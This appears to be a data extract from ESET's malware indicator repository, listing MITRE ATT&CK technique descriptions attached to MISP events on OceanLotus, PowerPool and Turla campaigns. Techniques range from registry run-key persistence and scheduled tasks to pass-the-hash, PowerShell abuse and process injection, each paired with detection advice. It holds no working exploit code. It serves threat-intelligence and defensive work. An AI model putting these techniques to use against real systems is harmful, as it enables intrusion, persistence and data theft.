Permissions: SYSTEM\n\nPermissions Required: Administrator, SYSTEM",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nPermissions Required: User, Administrator, SYSTEM",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.\n\nDetection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring\n\nPermissions Required: User, Administrator",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.\n\nDetection: Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the <code>svchost.exe<\/code> in Windows 10 and the Windows Task Scheduler <code>taskeng.exe<\/code> for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in <code>%systemroot%\\System32\\Tasks<\/code> for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler\/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)\n\n*Event ID 106 - Scheduled task registered\n*Event ID 140 - Scheduled task updated\n*Event ID 141 - Scheduled task removed\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring, Windows event logs\n\nEffective Permissions: Administrator, SYSTEM, User\n\nPermissions Required: Administrator, SYSTEM, User\n\nRemote Support: Yes\n\nContributors: Travis Smith, Tripwire, Leo Loobeek, @leoloobeek, Alain Homewood, Insomnia Security",	© ESET 2014-2018
malware-ioc	oceanlotus-rtf_ocx_campaigns.misp.event.json	"description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.\n\n===Windows===\n\nExample commands and utilities that obtain this information include <code>ver<\/code>, Systeminfo, and <code>dir<\/code> within cmd for identifying information based on present files and directories.\n\n===Mac===\n\nOn Mac, the <code>systemsetup<\/code> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the <code>system_profiler<\/code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User",	© ESET 2014-2018
malware-ioc	misp-powerpool.json	"description": "Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.[[Citation: Technet MS14-068]][[Citation: ADSecurity Detecting Forged Tickets]]\n\nDetection: Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X\n\nData Sources: Windows Error Reporting, File monitoring, Process monitoring\n\nEffective Permissions: User, Administrator, SYSTEM\n\nContributors: John Lambert, Microsoft Threat Intelligence Center",	© ESET 2014-2018
malware-ioc	misp-powerpool.json	"description": "Pass the hash (PtH)[[Citation: Aorato PTH]] is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a [[Credential Access]] technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[[Citation: NSA Spotting]]\n\nDetection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Authentication logs",	© ESET 2014-2018
malware-ioc	misp-powerpool.json	"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[[Citation: TechNet PowerShell]] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire,[[Citation: Github PowerShell Empire]] PowerSploit,[[Citation: Powersploit]] and PSAttack.[[Citation: Github PSAttack]]\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution.[[Citation: Malware Archaeology PowerShell Cheat Sheet]] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[[Citation: FireEye PowerShell Logging 2016]] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters",	© ESET 2014-2018
malware-ioc	misp-powerpool.json	"description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n===Mac===\n\nOn OSX, the native command <code>screencapture<\/code> is used to capture screenshots.\n\n===Linux===\n\nOn Linux, there is the native command <code>xwd<\/code>.[[Citation: Antiquated Mac Malware]]\n\nDetection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X\n\nData Sources: API monitoring, Process monitoring, File monitoring",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator\n\nRemote Support: Yes",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nAdversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful. \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)\n\nDetection: Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Authentication logs, Process monitoring\n\nEffective Permissions: User, Administrator\n\nDefense Bypassed: Anti-virus, Firewall, Host intrusion prevention systems, Network intrusion detection system, Process whitelisting, System access controls\n\nPermissions Required: User, Administrator",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.\n\nDetection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as Data Staged. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Data loss prevention\n\nPermissions Required: User\n\nSystem Requirements: Permissions to access directories and files that store information of interest.",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access certain files and directories",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Adversaries may target user email to collect sensitive information from a target.\n\nFiles containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.\n\nAdversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.\n\nSome adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.\n\nDetection: There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Authentication logs, File monitoring, Process monitoring, Process use of network",	© ESET 2014-2018
malware-ioc	misp-turla-lightneuron-event.json	"description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring\n\nRequires Network: Yes",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nDetection: If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution. (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator\n\nRemote Support: Yes",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting, PowerShell, or by using utilities present on the system.\n\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nDetection: Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as certutil.\n\nMonitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters\n\nDefense Bypassed: Anti-virus, Host intrusion prevention systems, Signature-based detection, Network intrusion detection system\n\nPermissions Required: User\n\nContributors: Matthew Demaske, Adaptforward, Red Canary",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n===Windows===\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)\n* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.\n* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n===Mac and Linux===\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.\n\nDetection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)\n\nMonitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)\n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)\n\nMonitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring\n\nEffective Permissions: User, Administrator, SYSTEM, root\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator, SYSTEM, root\n\nContributors: Anastasios Pingios",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n===Windows===\n\nExample utilities used to obtain this information are <code>dir</code> and <code>tree</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n===Mac and Linux===\n\nIn Mac and Linux, this kind of discovery is accomplished with the <code>ls</code>, <code>find</code>, and <code>locate</code> commands.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nPermissions Required: User, Administrator, SYSTEM",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.\n\n===Windows===\n\nAn example command that would obtain details on processes is \"tasklist\" using the Tasklist utility.\n\n===Mac and Linux===\n\nIn Mac and Linux, this is accomplished with the <code>ps</code> command.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Process command-line parameters, Process monitoring\n\nPermissions Required: User, Administrator, SYSTEM\n\nSystem Requirements: Administrator, SYSTEM may provide better process ownership details",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.\n\nDetection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as Reg or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Windows\n\nData Sources: Windows Registry, Process monitoring, Process command-line parameters\n\nPermissions Required: User, Administrator, SYSTEM",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access certain files and directories",	© ESET 2014-2018
malware-ioc	misp-turla-powershell-event.json	"description": "Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.\n\nAdversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.\n\nDetection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Process monitoring, Process command-line parameters\n\nSystem Requirements: Privileges to access removable media drive and files",	© ESET 2014-2018
